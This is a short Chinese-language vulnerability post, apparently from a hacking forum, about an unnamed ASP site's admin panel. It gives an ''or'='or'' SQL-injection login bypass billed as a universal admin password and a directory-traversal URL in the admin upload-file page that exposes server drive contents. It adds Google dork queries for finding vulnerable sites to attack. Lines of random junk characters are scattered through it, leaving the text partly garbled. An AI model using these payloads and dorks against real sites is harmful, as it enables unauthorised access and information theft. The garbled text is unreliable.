后台万能密码 'or'='or' N0 A" n$ A- O) b. y
/ x `7 U. S( y) ]( C" ^* U8 A
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!6 l6 B+ `# W) M, [
admin/uploadfile.asp?currentFolder=/upfiles/../
; C w& |' d' e+ n0 l% [6 ?0 o
; V/ u; j8 r& W/ S( s! t# C漏洞证明:
" I9 {% z5 X, n& v( i$ i) G8 j) D. X K+ _
谷歌:inurl:type.asp?id=1 新闻中心
& j* q# l; I9 \+ m. {$ |. q+ l或者 :inurl:download_ok.asp?
* c5 f" ~6 l5 O: i/ b+ |1 J7 @, Y$ {* k) L
|